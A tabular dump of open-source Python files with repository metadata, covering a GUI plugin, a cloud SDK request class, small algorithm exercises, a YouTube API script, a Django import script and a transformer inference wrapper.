blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 3
288
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
112
| license_type
stringclasses 2
values | repo_name
stringlengths 5
115
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 684
values | visit_date
timestamp[us]date 2015-08-06 10:31:46
2023-09-06 10:44:38
| revision_date
timestamp[us]date 1970-01-01 02:38:32
2037-05-03 13:00:00
| committer_date
timestamp[us]date 1970-01-01 02:38:32
2023-09-06 01:08:06
| github_id
int64 4.92k
681M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 22
values | gha_event_created_at
timestamp[us]date 2012-06-04 01:52:49
2023-09-14 21:59:50
⌀ | gha_created_at
timestamp[us]date 2008-05-22 07:58:19
2023-08-21 12:35:19
⌀ | gha_language
stringclasses 147
values | src_encoding
stringclasses 25
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 128
12.7k
| extension
stringclasses 142
values | content
stringlengths 128
8.19k
| authors
listlengths 1
1
| author_id
stringlengths 1
132
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
293ff497bc9c02162313472b028ec2ddb6e186bc | dd7dc458691dcff1b2493c927acd62695c2187c4 | /lib/python2.7/site-packages/envisage/ui/workbench/workbench_plugin.py | 224c2068f00fc03f60552f917b2f9ce3c91fd991 | [] | no_license | stephenosullivan/science | 16e0c7fb441af29810cad630e6187961ad57398e | 164e82df0655337ac4966273d9cc489d002d8987 | refs/heads/master | 2021-03-27T09:52:05.330679 | 2015-07-25T04:51:25 | 2015-07-25T04:51:25 | 39,672,995 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,048 | py | """ The Envisage workbench plugin. """
# Enthought library imports.
from envisage.api import ExtensionPoint, Plugin, ServiceOffer
from traits.api import Callable, List
# This module's package.
PKG = '.'.join(__name__.split('.')[:-1])
class WorkbenchPlugin(Plugin):
    """ The Envisage workbench plugin.
    The workbench plugin uses the PyFace workbench to provide the basis of an
    IDE-like user interface. The interface is made up of perspectives, views
    and editors.
    Note that this is not intended to be a 'general-purpose' plugin for user
    interfaces - it provides an IDE-like style and that is all. If your
    application requires another style of interface then write another plugin
    (you can still re-use all the menu, group and action contribution stuff!).
    """
    # The Ids of the extension points that this plugin offers.
    ACTION_SETS = PKG + '.action_sets'
    PERSPECTIVES = PKG + '.perspectives'
    PREFERENCES_PAGES = PKG + '.preferences_pages'
    WORKBENCH_SERVICE_OFFERS = PKG + '.service_offers'
    VIEWS = PKG + '.views'
    # The Ids of the extension points that this plugin contributes to.
    PREFERENCES = 'envisage.preferences'
    SERVICE_OFFERS = 'envisage.service_offers'
    #### 'IPlugin' interface ##################################################
    # The plugin's unique identifier.
    id = 'envisage.ui.workbench'
    # The plugin's name (suitable for displaying to the user).
    name = 'Workbench'
    #### Extension points offered by this plugin ##############################
    # Each ExtensionPoint below declares a list of factories that other
    # plugins may contribute to; the `desc` text is shown to contributors.
    action_sets = ExtensionPoint(
        List(Callable), id=ACTION_SETS, desc="""
        An action set contains the toobars, menus, groups and actions that you
        would like to add to top-level workbench windows (i.e. the main
        application window). You can create new toolbars, menus and groups
        and/or add to existing ones.
        Each contribution to this extension point must be a factory that
        creates an action set, where 'factory' means any callable with the
        following signature::
            callable(**traits) -> IActionSet
        The easiest way to contribute such a factory is to create a class
        that derives from 'envisage.ui.action.api.ActionSet'.
        """
    )
    perspectives = ExtensionPoint(
        List(Callable), id=PERSPECTIVES, desc="""
        A perspective is simply an arrangment of views around the (optionally
        hidden) editor area.
        Each contribution to this extension point must be a factory that
        creates a perspective, where 'factory' means any callable with the
        following signature::
            callable(**traits) -> IPerspective
        The easiest way to contribute such a factory is to create a class
        that derives from 'pyface.workbench.api.IPerspective'.
        """
    )
    preferences_pages = ExtensionPoint(
        List(Callable), id=PREFERENCES_PAGES, desc="""
        A preferences page appears in the preferences dialog to allow the user
        to manipulate some preference values.
        Each contribution to this extension point must be a factory that
        creates a preferences page, where 'factory' means any callable with the
        following signature::
            callable(**traits) -> IPreferencesPage
        The easiest way to contribute such a factory is to create a class
        that derives from 'apptools.preferences.ui.api.IPreferencesPage'.
        """
    )
    service_offers = ExtensionPoint(
        List(ServiceOffer),
        id = WORKBENCH_SERVICE_OFFERS,
        desc = """
        Services are simply objects that a plugin wants to make available to
        other plugins. This extension point allows you to offer 'per
        window' services that are created 'on-demand' (where 'on demand' means
        the first time somebody looks up a service of the appropriate
        protocol).
        .
        e.g.
        my_service_offer = ServiceOffer(
            protocol = 'acme.IMyService',
            factory = an_object_or_a_callable_that_creates_one,
            properties = {'a dictionary' : 'that is passed to the factory'}
        )
        Any properties specified are passed as keywrod arguments to the
        factory, i.e. the factory signature is::
            callable(**properties)
        """
    )
    views = ExtensionPoint(
        List(Callable), id=VIEWS, desc="""
        A view provides information to the user to support their current
        task. Views can contain anything you like(!) and are arranged around
        the (optionally hidden) editor area. The user can re-arrange views as
        he/she sees fit.
        Each contribution to this extension point must be a factory that
        creates a view, where 'factory' means any callable with the following
        signature::
            callable(**traits) -> IView
        The easiest way to contribute such a factory is to create a class
        that derives from 'pyface.workbench.api.View'.
        It is also common to use a simple function (especially when a view
        is a representation of a service) e.g::
            def foo_view_factory(**traits):
                ' Create a view that is a representation of a service. '
                foo = self.application.get_service('IFoo')
                return FooView(foo=foo, **traits)
        """
    )
    #### Contributions to extension points made by this plugin ################
    # The `_xxx_default` methods below are Traits lazy initializers: each one
    # runs the first time the corresponding contribution list is accessed.
    my_action_sets = List(contributes_to=ACTION_SETS)
    def _my_action_sets_default(self):
        """ Trait initializer. """
        # NOTE(review): implicit relative import (Python 2 semantics); under
        # Python 3 this would need `from .default_action_set import ...` --
        # confirm the supported interpreter for this tree.
        from default_action_set import DefaultActionSet
        return [DefaultActionSet]
    my_preferences = List(contributes_to=PREFERENCES)
    def _my_preferences_default(self):
        """ Trait initializer. """
        # Default preferences are bundled with the package as an .ini file.
        return ['pkgfile://envisage.ui.workbench/preferences.ini']
    my_preferences_pages = List(contributes_to=PREFERENCES_PAGES)
    def _my_preferences_pages_default(self):
        """ Trait initializer. """
        # NOTE(review): implicit relative import, same caveat as above.
        from workbench_preferences_page import WorkbenchPreferencesPage
        return [WorkbenchPreferencesPage]
    my_service_offers = List(contributes_to=SERVICE_OFFERS)
    def _my_service_offers_default(self):
        """ Trait initializer. """
        preferences_manager_service_offer = ServiceOffer(
            protocol = 'apptools.preferences.ui.preferences_manager'
            '.PreferencesManager',
            factory = self._create_preferences_manager_service
        )
        workbench_service_offer = ServiceOffer(
            protocol = 'envisage.ui.workbench.workbench.Workbench',
            factory = self._create_workbench_service
        )
        return [preferences_manager_service_offer, workbench_service_offer]
    ###########################################################################
    # Private interface.
    ###########################################################################
    def _create_preferences_manager_service(self, **properties):
        """ Factory method for the preferences manager service. """
        from apptools.preferences.ui.api import PreferencesManager
        # Instantiate every contributed preferences page for the manager.
        preferences_manager = PreferencesManager(
            pages=[factory() for factory in self.preferences_pages]
        )
        return preferences_manager
    def _create_workbench_service(self, **properties):
        """ Factory method for the workbench service. """
        # We don't actually create the workbench here, we just return a
        # reference to it.
        #
        # fixme: This guard is really just for testing when we have the
        # workbench plugin as a source egg (i.e. if the egg is on our path
        # then we get the plugin for any egg-based application, even if it is
        # not a workbench application!).
        return getattr(self.application, 'workbench', None)
### EOF ######################################################################
| [
"[email protected]"
] | |
995f17f49f0cc20090ed4da3fc31fdabd4c2e5df | 6a61ef12621c8a917d160db62415487fe2c469f7 | /aliyun-python-sdk-outboundbot/aliyunsdkoutboundbot/request/v20191226/DeleteJobGroupRequest.py | 6edfb7caf350c296ba47360d1600bde52a8e0e09 | [
"Apache-2.0"
] | permissive | zhangwp-cn/aliyun-openapi-python-sdk | f0b15369665a956490534c942676ed15410196f7 | a560e38f97351db05d13f0588f7bdfb4292ed3ae | refs/heads/master | 2022-09-08T13:31:26.842867 | 2020-06-04T03:23:30 | 2020-06-04T03:23:30 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,607 | py | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
#
# http://www.apache.org/licenses/LICENSE-2.0
#
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from aliyunsdkcore.request import RpcRequest
from aliyunsdkoutboundbot.endpoint import endpoint_data
class DeleteJobGroupRequest(RpcRequest):
    """RPC request wrapper for the OutboundBot ``DeleteJobGroup`` API
    (product version 2019-12-26)."""

    def __init__(self):
        RpcRequest.__init__(self, 'OutboundBot', '2019-12-26', 'DeleteJobGroup','outboundbot')
        # Attach endpoint-resolution data when the installed core supports it.
        if hasattr(self, "endpoint_map"):
            self.endpoint_map = endpoint_data.getEndpointMap()
        if hasattr(self, "endpoint_regional"):
            self.endpoint_regional = endpoint_data.getEndpointRegional()

    def get_InstanceId(self):
        """Return the currently configured InstanceId query parameter."""
        return self.get_query_params().get('InstanceId')

    def set_InstanceId(self, InstanceId):
        """Set the InstanceId query parameter."""
        self.add_query_param('InstanceId', InstanceId)

    def get_JobGroupId(self):
        """Return the currently configured JobGroupId query parameter."""
        return self.get_query_params().get('JobGroupId')

    def set_JobGroupId(self, JobGroupId):
        """Set the JobGroupId query parameter."""
        self.add_query_param('JobGroupId', JobGroupId)
"[email protected]"
] | |
0b4681cbbbd15b1ae82f979dfb0855a484f541fc | 8e3b452b08139f25be824fae2b8b7aabb158d888 | /6.00.1.x/Week3/Lecture5/lectureCode_Lec5-towers.py | 13861370c38b6bf6a8bbf93b0af680633678f9d6 | [] | no_license | prasannabe2004/MITx | d38a11e38a0abb73ffa37dccb363f779011155ab | 1954b5fc31004c94f46fc8194b7fa773108c4493 | refs/heads/master | 2020-05-16T19:14:00.963550 | 2015-08-07T18:50:12 | 2015-08-07T18:50:12 | 25,537,861 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 285 | py | def printMove(fr, to):
print('move from ' + str(fr) + ' to ' + str(to))
def Towers(n, fr, to, spare):
    """Print the move sequence that solves Towers of Hanoi for n disks,
    moving the stack from peg `fr` to peg `to` using `spare`."""
    if n == 1:
        printMove(fr, to)
        return
    # Shift the top n-1 disks out of the way, move the largest disk,
    # then bring the n-1 disks back on top of it.
    Towers(n - 1, fr, spare, to)
    Towers(1, fr, to, spare)
    Towers(n - 1, spare, to, fr)
Towers(5, 'f','t','s')
"[email protected]"
] | |
2e9e653a3ba5f6b2d39e8bc2a9b81531627f0d53 | be5c86e8fe3f5836b7d2097dd5272c72b5b28f15 | /binary-search/Python/0069-sqrtx(调试代码).py | 34fb4dc1e8fd789b231dfc3dc042a189448bc516 | [
"Apache-2.0"
] | permissive | lemonnader/LeetCode-Solution-Well-Formed | d24674898ceb5441c036016dc30afc58e4a1247a | baabdb1990fd49ab82a712e121f49c4f68b29459 | refs/heads/master | 2021-04-23T18:49:40.337569 | 2020-03-24T04:50:27 | 2020-03-24T04:50:27 | 249,972,064 | 1 | 0 | Apache-2.0 | 2020-03-25T12:26:25 | 2020-03-25T12:26:24 | null | UTF-8 | Python | false | false | 1,303 | py | class Solution:
def mySqrt(self, x: int) -> int:
if x == 0:
return 0
left = 1
right = x // 2
while left < right:
# 调试代码开始:为了仔细观察区间左右端点,我们每进入一次循环,让线程休眠 1 秒
import time
time.sleep(1)
print('调试代码,观察区间左右端点、中位数,和进入的分支: left = {} , right = {} , '.format(left, right), end='')
# 调试代码结束
# 错误代码,在分支左区间不发生收缩的情况下,中位数应该取右中位数
# mid = left + (right - left) // 2
mid = (left + right) >> 1
# 调试代码
print('mid = {} ,'.format(mid), end=' ')
square = mid * mid
if square > x:
# 调试代码
print('进入 right = mid - 1 这个分支。')
right = mid - 1
else:
# 调试代码
print('进入 left = mid 这个分支。')
left = mid
return left
if __name__ == '__main__':
    # Demonstration driver for the binary-search walkthrough: x = 8
    # succeeded with the original midpoint choice, while x = 9 exercised
    # the failing case.
    print(Solution().mySqrt(9))
| [
"[email protected]"
] | |
21e37b4f7a6e38423629ff7f88949c775997a74a | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02536/s375378291.py | 93ecd40e03e6ad422973faf79ca95508b26c6569 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,207 | py | import sys
sys.setrecursionlimit(10 ** 9)
class UnionFind():
    """Disjoint-set union (DSU) over elements 0..n, using union by rank
    and recursive path compression.

    ``root[i]`` holds the parent of ``i``, or ``-(component size)`` when
    ``i`` is a representative; ``rank[i]`` is an upper bound on the height
    of the tree rooted at ``i``.
    """

    def __init__(self, n):
        self.n = n
        self.root = [-1] * (n + 1)  # parent pointers / negated sizes at roots
        self.rank = [0] * (n + 1)   # height upper bounds

    def find(self, x):
        """Return the representative of x, compressing the path on the way."""
        if self.root[x] < 0:
            return x
        self.root[x] = self.find(self.root[x])
        return self.root[x]

    def unite(self, x, y):
        """Merge the components of x and y (no-op if already the same)."""
        x, y = self.find(x), self.find(y)
        if x == y:
            return
        if self.rank[x] > self.rank[y]:
            x, y = y, x  # make y the root of the taller (or equally tall) tree
        self.root[y] += self.root[x]  # accumulate the component size
        self.root[x] = y              # hang the shorter tree under y
        if self.rank[x] == self.rank[y]:
            self.rank[y] += 1

    def issame(self, x, y):
        """Return True when x and y belong to the same component."""
        return self.find(x) == self.find(y)

    def count(self, x):
        """Return the size of the component containing x."""
        return -self.root[self.find(x)]
# Read a graph with n vertices (1-based in the input) and m edges from
# stdin, union the endpoints of every edge, then print the number of
# connected components minus one.
n, m = map(int, input().split())
uf = UnionFind(n)
for i in range(m):
    a, b = map(int, input().split())
    uf.unite(a-1, b-1)  # input is 1-based; the structure is 0-based
ans = set()
for i in range(n):
    ans.add(uf.find(i))  # one representative per connected component
print(len(ans)-1)
"[email protected]"
] | |
e1508f8201b4113f896bf0ace8208bf541a2431b | de4d88db6ea32d20020c169f734edd4b95c3092d | /aiotdlib/api/types/sponsored_message.py | d0baa01e34edffdfdd0b1242e871c3ddd8921c86 | [
"LicenseRef-scancode-unknown-license-reference",
"MIT"
] | permissive | thiagosm/aiotdlib | 5cc790a5645f7e4cc61bbd0791433ed182d69062 | 4528fcfca7c5c69b54a878ce6ce60e934a2dcc73 | refs/heads/main | 2023-08-15T05:16:28.436803 | 2021-10-18T20:41:27 | 2021-10-18T20:41:27 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,493 | py | # =============================================================================== #
# #
# This file has been generated automatically!! Do not change this manually! #
# #
# =============================================================================== #
from __future__ import annotations
import typing
from pydantic import Field
from .internal_link_type import InternalLinkType
from .message_content import MessageContent
from ..base_object import BaseObject
class SponsoredMessage(BaseObject):
    """
    Describes a sponsored message
    :param id: Unique sponsored message identifier
    :type id: :class:`int`
    :param sponsor_chat_id: Chat identifier
    :type sponsor_chat_id: :class:`int`
    :param link: An internal link to be opened when the sponsored message is clicked; may be null. If null, the sponsor chat needs to be opened instead, defaults to None
    :type link: :class:`InternalLinkType`, optional
    :param content: Content of the message
    :type content: :class:`MessageContent`
    """
    # Type discriminator used by the Telegram API, serialized as "@type".
    ID: str = Field("sponsoredMessage", alias="@type")
    id: int
    sponsor_chat_id: int
    link: typing.Optional[InternalLinkType] = None
    content: MessageContent
    @staticmethod
    def read(q: dict) -> SponsoredMessage:
        """Build a SponsoredMessage from a raw API dict (pydantic's
        ``construct`` creates the model without running validation)."""
        return SponsoredMessage.construct(**q)
| [
"[email protected]"
] | |
af66f3e9667cc2d7a9aca8543be26bbdbeffb849 | af9c0aafa10b7901533de0b32177ab80b4782d3f | /notes/code/youtube/comments_one_video.py | 0ae8f2715bd2cd2765d7e2162e6561247db18f41 | [
"MIT"
] | permissive | Akramz/msds692 | d1d33298b7599950e95838c0fc9ddbd47a98ed5b | 42f4c2a0dc7569152bac2439e9b6385f2f101f7b | refs/heads/master | 2023-01-25T00:44:11.197544 | 2020-12-05T22:05:14 | 2020-12-05T22:05:14 | 319,362,758 | 1 | 0 | MIT | 2020-12-07T15:31:12 | 2020-12-07T15:31:11 | null | UTF-8 | Python | false | false | 708 | py | import sys
from googleapiclient.discovery import build
# Fetch the first page of top-level comment threads for one hard-coded
# video and print each author/comment pair.
# Usage: python comments_one_video.py <YOUTUBE_API_KEY>
DEVELOPER_KEY = sys.argv[1]
YOUTUBE_API_SERVICE_NAME = "youtube"
YOUTUBE_API_VERSION = "v3"
video_id = "gU_gYzwTbYQ" # bonkers the cat
# code from https://developers.google.com/youtube/v3/docs/comments/list
youtube = build(YOUTUBE_API_SERVICE_NAME, YOUTUBE_API_VERSION, developerKey=DEVELOPER_KEY)
results = youtube.commentThreads().list(
    part="snippet",
    videoId=video_id,
    textFormat="plainText"
).execute()
for item in results["items"]:
    # Each thread's top-level comment carries the author and display text.
    comment = item["snippet"]["topLevelComment"]
    author = comment["snippet"]["authorDisplayName"]
    text = comment["snippet"]["textDisplay"]
    print("Comment by %s: %s" % (author, text))
"[email protected]"
] | |
1b14e0893000f94e90a7478eb66d700400cb0141 | 7882860350c714e6c08368288dab721288b8d9db | /1일차/if(8번문제).py | 9db67865be7d0871db81bafb600eeaa1d088a3f2 | [] | no_license | park-seonju/Algorithm | 682fca984813a54b92a3f2ab174e4f05a95921a8 | 30e5bcb756e9388693624e8880e57bc92bfda969 | refs/heads/master | 2023-08-11T18:23:49.644259 | 2021-09-27T10:07:49 | 2021-09-27T10:07:49 | 388,741,922 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 192 | py | result=[]
# Collect every number in [100, 300] whose hundreds prefix, tens prefix
# and the number itself are all even, then print them comma-separated.
for value in range(100, 301):
    hundreds = int(value / 100)  # must be truncated to an int
    tens = int(value / 10)
    if hundreds % 2 == 0 and tens % 2 == 0 and value % 2 == 0:
        result.append(str(value))
print(",".join(result))
| [
"[email protected]"
] | |
76283425866e43198277a6f4f43dcc74ae590214 | e1009433697344f0ce6ec953f086be698fa4e6c4 | /parsmodel.py | 10d1dbeb9a2e033a4397f7c7bf345fec03e56af2 | [] | no_license | bladas/online-store | 7e848bad1137cf7886cec6bf7563867e5f8f5e36 | 6fd68e0d1318b796b05a94fa5547d5e87a2b0172 | refs/heads/master | 2023-05-02T07:11:55.614313 | 2020-01-06T14:20:19 | 2020-01-06T14:20:19 | 216,340,778 | 0 | 0 | null | 2023-04-21T20:38:49 | 2019-10-20T10:00:46 | Python | UTF-8 | Python | false | false | 2,339 | py | import json
from home.models import Category, UnderCategory, Product
def create(json, Category, UnderCategory, Product):
    """Import product records from ``citrus.json`` into the database.

    Each record is a dict carrying ``category``, ``undercategory``,
    ``name`` and ``price`` keys.  Categories and under-categories are
    re-used when they already exist (``get_or_create``); a ``Product``
    row is created for every record.

    :param json: the ``json`` module (injected by the module-level call below)
    :param Category: Django model class for top-level categories
    :param UnderCategory: Django model class for sub-categories
    :param Product: Django model class for products

    The original implementation nested bare ``try/except`` blocks and, on
    the "category exists but under-category does not" path, referenced the
    never-bound name ``new_category`` -- a latent NameError that was then
    swallowed by the outer ``except``, creating duplicate categories and
    dropping some products entirely.
    """
    with open('citrus.json', 'r') as json_file:
        data = json.load(json_file)
    for elem in data:
        # get_or_create makes both lookups idempotent and removes the
        # duplicated create/save logic of the original branches.
        category, _ = Category.objects.get_or_create(title=elem.get('category'))
        ucategory, _ = UnderCategory.objects.get_or_create(
            title=elem.get('undercategory'), category=category
        )
        # Model.objects.create() persists the new row; no extra save() needed.
        Product.objects.create(
            name=elem.get('name'),
            ucategory=ucategory,
            price=elem.get('price'),
        )
create(json, Category, UnderCategory, Product)
| [
"[email protected]"
] | |
56d37d047190975695cb0168c225c11656be6066 | d94b6845aeeb412aac6850b70e22628bc84d1d6d | /routing_transformer/routing_tf_api.py | ddc35172d2adda48e5cb8cb0ef32aaa4146d4629 | [
"CC-BY-4.0",
"Apache-2.0"
] | permissive | ishine/google-research | 541aea114a68ced68736340e037fc0f8257d1ea2 | c1ae273841592fce4c993bf35cdd0a6424e73da4 | refs/heads/master | 2023-06-08T23:02:25.502203 | 2023-05-31T01:00:56 | 2023-05-31T01:06:45 | 242,478,569 | 0 | 0 | Apache-2.0 | 2020-06-23T01:55:11 | 2020-02-23T07:59:42 | Jupyter Notebook | UTF-8 | Python | false | false | 7,727 | py | # coding=utf-8
# Copyright 2023 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import pdb
import tensorflow.compat.v1 as tf
tf.disable_v2_behavior()
tf.get_logger().setLevel('ERROR')
from tensor2tensor import models
from tensor2tensor import problems
from tensor2tensor.utils import trainer_lib
from tensor2tensor.utils import hparams_lib
from tensor2tensor.utils import registry
from tensor2tensor.utils import metrics
from tensor2tensor.data_generators import text_encoder
from tensor2tensor.data_generators import problem
from routing_transformer.problems import pg19
from tensorflow.compat.v1 import estimator as tf_estimator
from tqdm import tqdm
from routing_transformer.sparse_transformer import SparseTransformer
import numpy as np
import random
from scipy.special import log_softmax
VOCAB_PATH = "/mnt/nfs/work1/miyyer/simengsun/in-book-retrieval/RT-data/vocab.pg19_length8k.32768.subwords"
HPARAMS_PATH = "/mnt/nfs/work1/miyyer/simengsun/in-book-retrieval/RT-models/rt-checkpoint/hparams.json"
CKPT_PATH = "/mnt/nfs/work1/miyyer/simengsun/in-book-retrieval/RT-models/rt-checkpoint/ckpt-3530000"
MAX_SEQUENCE_LENGTH = 8192
class SparseTransformerWrapper(object):
    """Thin TF1 inference wrapper around the Routing (Sparse) Transformer:
    builds the graph once, restores checkpoint weights, and scores text."""
    def __init__(self, max_seq_length=None):
        """Build the eval-mode graph and session.

        :param max_seq_length: sequence length to pad/truncate to; must be
            a multiple of 256. Defaults to MAX_SEQUENCE_LENGTH.
        """
        # Load hyperparameters
        self.max_seq_length = max_seq_length or MAX_SEQUENCE_LENGTH
        # Needed since RT uses blocks of size 256
        assert self.max_seq_length % 256 == 0
        hparams = hparams_lib.create_hparams_from_json(HPARAMS_PATH)
        hparams.use_tpu = False
        hparams = zero_dropout(hparams)
        # Build TF1 graph of model
        sptf_model = SparseTransformer(hparams, tf_estimator.ModeKeys.EVAL)
        self.input_nodes = {
            "targets": tf.placeholder(tf.int32, [None, self.max_seq_length])
        }
        self.output_nodes = sptf_model.body(self.input_nodes)
        # Map the checkpoint variables to the graph
        init_from_checkpoint(CKPT_PATH, variable_prefix="sparse_transformer/body")
        # create a session object, and actually initialize the graph
        self.sess = tf.Session()
        self.sess.run(tf.global_variables_initializer())
        self.encoder = text_encoder.SubwordTextEncoder(VOCAB_PATH)
    def forward(self, sentences, encode_sentences=True, relevant_subsequences=None):
        """Score a batch of texts with the language model.

        :param sentences: list of raw strings (when encode_sentences is
            True) or pre-encoded token-id lists.
        :param encode_sentences: whether to subword-encode the inputs here.
        :param relevant_subsequences: optional list (one raw string per
            input) whose log-loss is computed over just that span.
        :return: dict with "logits" (per-position token logits after
            squeezing axes 2 and 3), "loss" (the model's training loss),
            "encoded_seqs_no_pad", and -- when relevant_subsequences is
            given -- "subseq_log_loss" / "misaligned_prefix_length".
            NOTE(review): the subseq_* keys are overwritten on every loop
            iteration, so only the LAST subsequence's values survive --
            confirm callers only pass a single-element batch here.
        """
        encoded_sents = []
        encoded_seqs_no_pad = []
        if encode_sentences:
            for sent in sentences:
                encoded = []
                # Encode line by line, stopping before overflowing the
                # maximum sequence length; each line ends with EOS.
                for line in sent.split("\n"):
                    new_tokens = self.encoder.encode(line.strip())
                    if len(encoded) + len(new_tokens) >= self.max_seq_length:
                        break
                    encoded.extend(new_tokens)
                    encoded.append(text_encoder.EOS_ID)
                encoded_seqs_no_pad.append(encoded)
                # pad shorter sequences to the full length
                encoded = encoded + [text_encoder.PAD_ID for _ in range(self.max_seq_length - len(encoded))]
                assert len(encoded) == self.max_seq_length
                encoded_sents.append(encoded)
        else:
            # assume sentences are encoded, pad/truncate them
            for sent in sentences:
                sent = sent[:self.max_seq_length]
                encoded_seqs_no_pad.append(sent)
                sent = sent + [text_encoder.PAD_ID for _ in range(self.max_seq_length - len(sent))]
                encoded_sents.append(sent)
        feed_dict = {
            self.input_nodes["targets"]: np.array(encoded_sents)
        }
        outputs = self.sess.run(self.output_nodes, feed_dict=feed_dict)
        return_outputs = {
            "logits": np.squeeze(outputs[0], axis=(2, 3)),
            "loss": outputs[1]["training"],
            "encoded_seqs_no_pad": encoded_seqs_no_pad
        }
        if relevant_subsequences is not None:
            for i, rss in enumerate(relevant_subsequences):
                encoded_subseq = self.encoder.encode(rss)
                positions = find_sub_list(encoded_subseq, encoded_sents[i])
                misaligned_prefix_length = 0
                # Subword boundaries may not line up with the raw string;
                # drop leading tokens until the remainder is found.
                while positions is None:
                    misaligned_prefix_length += 1
                    encoded_subseq = encoded_subseq[1:]
                    positions = find_sub_list(encoded_subseq, encoded_sents[i])
                start, end = positions[-1]
                relevant_logits = return_outputs["logits"][i][start:end]
                log_probs = log_softmax(relevant_logits, axis=1)
                # Mean negative log-probability of the gold tokens in the span.
                gold_log_probs = [lp[index] for index, lp in zip(encoded_subseq, log_probs)]
                return_outputs["subseq_log_loss"] = -1 * np.mean(gold_log_probs)
                return_outputs["misaligned_prefix_length"] = misaligned_prefix_length
        return return_outputs
    def close(self):
        """Release the underlying TensorFlow session."""
        self.sess.close()
def find_sub_list(sl, l):
    """Find sub-string, so as to be able to compute ppl of a sub-string."""
    # Every (start, end) half-open span at which `sl` occurs inside `l`;
    # falls through (returning None) when there is no occurrence.
    width = len(sl)
    matches = [
        (start, start + width)
        for start, token in enumerate(l)
        if token == sl[0] and l[start:start + width] == sl
    ]
    if matches:
        return matches
def zero_dropout(hparams):
    """Disable every dropout knob on `hparams` (eval/inference mode)."""
    for knob in ("input_dropout", "dropout", "relu_dropout",
                 "attention_dropout", "layer_prepostprocess_dropout"):
        setattr(hparams, knob, 0.0)
    return hparams
def log_variables(name, var_names):
    """Log a label, the variable count, and a small random sample of names."""
    sample = random.sample(var_names, min(len(var_names), 5))
    tf.logging.info("%s (%d total): %s", name, len(var_names), sample)
def init_from_checkpoint(checkpoint_path,
                         checkpoint_prefix=None,
                         variable_prefix=None,
                         target_variables=None):
    """Initialize graph variables from the checkpoint at `checkpoint_path`.

    Args:
      checkpoint_path: checkpoint to read variable values from.
      checkpoint_prefix: optional prefix prepended to checkpoint variable
        names before matching against graph variables.
      variable_prefix: optional prefix prepended to graph variable names
        before matching.
      target_variables: variables to initialize; defaults to all trainable
        variables in the current graph.

    Only names present in both the (possibly prefixed) checkpoint and graph
    sets are assigned; the rest are logged as uninitialized/unused.
    """
    tf.logging.info("Loading variables from %s", checkpoint_path)
    # Optimizer slots (Adafactor) are deliberately skipped.
    checkpoint_variables = {
        name: name for name, _ in tf.train.list_variables(checkpoint_path) if "Adafactor" not in name
    }
    if target_variables is None:
        target_variables = tf.trainable_variables()
    # Strip the ":0" output suffix so names match checkpoint keys.
    target_variables = {var.name.split(":")[0]: var for var in target_variables}
    if checkpoint_prefix is not None:
        checkpoint_variables = {
            checkpoint_prefix + "/" + name: varname
            for name, varname in checkpoint_variables.items()
        }
    if variable_prefix is not None:
        target_variables = {
            variable_prefix + "/" + name: var
            for name, var in target_variables.items()
        }
    checkpoint_var_names = set(checkpoint_variables.keys())
    target_var_names = set(target_variables.keys())
    intersected_var_names = target_var_names & checkpoint_var_names
    # Map original checkpoint names to the live graph variables.
    assignment_map = {
        checkpoint_variables[name]: target_variables[name]
        for name in intersected_var_names
    }
    tf.train.init_from_checkpoint(checkpoint_path, assignment_map)
    log_variables("Loaded variables", intersected_var_names)
    log_variables("Uninitialized variables", target_var_names - checkpoint_var_names)
    log_variables("Unused variables", checkpoint_var_names - target_var_names)
| [
"[email protected]"
] | |
6ecd7aef7feeaf0c0a1b5b863f5a9956e43c4838 | 99094cc79bdbb69bb24516e473f17b385847cb3a | /58.Length of Last Word/Solution.py | 6a986db084927025fd5e816d63158989ce2edd7a | [] | no_license | simonxu14/LeetCode_Simon | 7d389bbfafd3906876a3f796195bb14db3a1aeb3 | 13f4595374f30b482c4da76e466037516ca3a420 | refs/heads/master | 2020-04-06T03:33:25.846686 | 2016-09-10T00:23:11 | 2016-09-10T00:23:11 | 40,810,940 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 248 | py | __author__ = 'Simon'
class Solution(object):
    def lengthOfLastWord(self, s):
        """
        :type s: str
        :rtype: int

        Length of the final whitespace-delimited word in s, or 0 when s
        contains no words at all.
        """
        words = s.split()
        return len(words[-1]) if words else 0
"[email protected]"
] | |
